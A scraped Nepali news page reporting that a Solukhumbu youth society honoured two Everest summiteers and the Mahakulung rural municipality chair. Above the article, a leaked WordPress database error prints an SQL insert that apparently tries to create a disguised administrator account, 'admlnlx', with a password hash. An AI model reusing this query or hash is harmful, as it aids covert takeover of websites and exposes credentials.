WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxUdPXPg2RCviNP6dReWGOkzbxvcwQ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 07:01:04', '', 'admlnlx', 'admlnlx')

सगरमाथा आरोही दुई सहित गा. पा. अध्यक्ष राईलाई चेरेम युवा समाजद्धारा सम्मानित – Gaule Khabar

सगरमाथा आरोही दुई सहित गा. पा. अध्यक्ष राईलाई चेरेम युवा समाजद्धारा सम्मानित

सगरमाथा आरोही दुई सहित गा. पा. अध्यक्ष राईलाई चेरेम युवा समाजद्धारा सम्मानित

काठमाण्डौ । सोलुखुम्बुको चेरेम युवा समाज महाकुलुङ १ ले बधाई तथा सम्मान कार्यक्रम सम्पन्न गरेको छ । चेरेम युवा समाज महाकुलुङ र महाकुलुङ गाउँपालिकाको लोगोे अंकीत झण्डा विश्वको सर्वोच्च शिखर सगरमाथामा पु¥याउन सफल स्थानिय गाल्देन शेर्पा तथा पासाङ ओङछु शेर्पालाई समाजले सम्मान गरेको हो ।

काठ्माडौ कपन स्थीत सिद्धार्थ बुटीक होटलमा आयोजना गरिएको बधाई तथा सम्मान कार्यक्रममा नव निर्वाचीत महाकुलुङ गाउँ पालिका अध्यष सुर्य बहादुर राईलाई समेत सम्मान गरिएको छ । गाउँ पालिका अध्यक्ष राईलाई भने जनअपेक्षा अनुसार महाकुलुङको पर्यटन तथा अन्य विकासमा लागि पर्न भन्दै समाजले सम्मान गरेको हो ।

कार्यक्रम चेरेम युवा समाजका अध्यक्ष फुर ल्हाक्पा शेर्पाका सभाध्यक्षता तथा पुर्व राज्य मन्त्री तथा प्रदेश नं। १ सोलुखुम्बुका प्रदेश सभा सदस्य माननिय उत्तम कुमार बस्नेतको प्रमुख आतिथ्यतामा सम्पन्न भएको थियो ।

प्रदेश सभा सदस्य पुर्व राज्य मन्त्री उत्तम कुमार बस्नेतले महाकुलुङ गाउँ पालिकालाई विविध सम्भावना बोकेको गाउँपालिकाको रुपमा चित्रण गर्दै यस गाउँ पालिकालाई थप मजबुत बनाउनका लागि प्रदेश सरकारबाट विभिन्न विकास निर्माण योजनालाई अघि सारेको उहाँले बताए ।

कार्यक्रममा नेकपा एमाले महाकुलुङ गाउँ पालिका अध्यक्ष मछिन्द्र कुलुङ, पर्यटन व्यवसायी तथा स्थानिय सञ्चारकर्मीहरुको उपस्थीती रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका